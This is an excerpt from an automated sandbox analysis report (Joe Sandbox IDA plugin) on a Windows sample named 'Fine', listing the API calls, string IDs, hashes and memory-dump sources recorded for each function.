                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c4b3d4c5f4b9dc02c35b732c7e3a19af049ce3828dd94c912a45eca212e7f66a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8459630ce34fd18153f6e79e0c61e8b1c761045ea13288c32d6fe88c49aa35f5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4b3d4c5f4b9dc02c35b732c7e3a19af049ce3828dd94c912a45eca212e7f66a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37B1F4316287129FC718EF28C890A6BB7E5BFA4724F50491EF4DA87292D770D854CB92
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BBF8
                                                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC10
                                                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC34
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BC60
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC74
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC96
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BD92
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00240F4E: GetStdHandle.KERNEL32(000000F6), ref: 00240F6D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BDAB
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BDC6
                                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0025BE16
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0025BE67
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0025BE99
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025BEAA
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025BEBC
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025BECE
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0025BF43
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5ba2936969c04451d0b015e3bf0cb27ee6ad7ce18bcc9bea3c8bbec4417470f6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 10560c4ac0be199a06cd64fadc87f680c7c9e8f6d7e9f2a52c3c5d5254fe7978
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ba2936969c04451d0b015e3bf0cb27ee6ad7ce18bcc9bea3c8bbec4417470f6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82F1CE716143019FC715EF24C891B6ABBE1BF94315F18895EF8858B2A2CB70EC58CF56
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0026DCD0), ref: 00254B18
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00254B2A
                                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0026DCD0), ref: 00254B4F
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,0026DCD0), ref: 00254B9B
                                                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,0026DCD0), ref: 00254C05
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 00254CBF
                                                                                                                                                                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00254D25
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00254D4F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b7f00795bf1bc559314b97e416c153befbdad7b4503f78d6360ae84f22a24a8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: eccf1466c66c184292fc42c3517170b5d6702f3103175d30b7b0d9712aa34325
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b7f00795bf1bc559314b97e416c153befbdad7b4503f78d6360ae84f22a24a8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB127E71A10109EFCB14DF54C888EAEB7B5FF85319F248098F8099B251D771ED9ACBA4
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(002A29C0), ref: 00213F72
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(002A29C0), ref: 00214022
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00214066
                                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0021406F
                                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(002A29C0,00000000,?,00000000,00000000,00000000), ref: 00214082
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0021408E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 00267823
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00267897
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002678B9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002678CC
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 002678ED
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001D0000,00000000), ref: 0026791C
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00267935
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0026794E
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00267955
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0026796D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00267985
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D1488,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 001D1865
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 001D1521
                                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,001D145A,00000000,?), ref: 001D15BB
                                                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 002129B4
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 002129E2
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 002129F9
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001D145A,00000000), ref: 00212A15
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00212A27
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                                            • String ID: <)*
                                                                                                                                                                                                                                                                                                                            • API String ID: 641708696-1305318363
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0024CEF5
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0024CF08
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0024CF1C
                                                                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0024CF35
                                                                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0024CF78
                                                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0024CF8E
                                                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0024CF99
                                                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0024CFC9
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0024D021
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0024D035
                                                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0024D040
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002666D6,?,?), ref: 00268FEE
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00268FFE
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269009
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269016
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00269024
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269033
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0026903C
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269043
                                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269054
                                                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00270C04,?), ref: 0026906D
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0026907D
                                                                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0026909D
                                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002690CD
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 002690F5
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0026910B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C154
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0025C1D2
                                                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 0025C26A
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0025C2DE
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0025C2FC
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0025C352
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0025C364
                                                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0025C382
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0025C3E3
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025C3F4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0026A990
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 0026A9A7
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 0026A9B3
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0026A9C9
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0026AC15
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0026AC33
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0026AC54
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 0026AC73
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0026AC95
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 0026ACBB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                                            • String ID: @$(*
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002697B6
                                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 002697C6
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 002697D1
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00269879
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0026992B
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00269948
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00269958
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0026998A
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002699CC
                                                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002699FD
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                                            • String ID: 0$(*
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00253035
                                                                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00253045
                                                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00253051
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 0025305E
                                                                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002530CA
                                                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00253109
                                                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0025312D
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00253135
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0025313E
                                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00253145
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00253150
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 002352E6
                                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00235328
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00235339
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00235345
                                                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0023537A
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 002353B2
                                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 002353EB
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00235445
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00235477
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 002354EF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(002A29C0,000000FF,00000000,00000030), ref: 0023C973
                                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(002A29C0,00000004,00000000,00000030), ref: 0023C9A8
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0023C9BA
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0023CA00
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0023CA1D
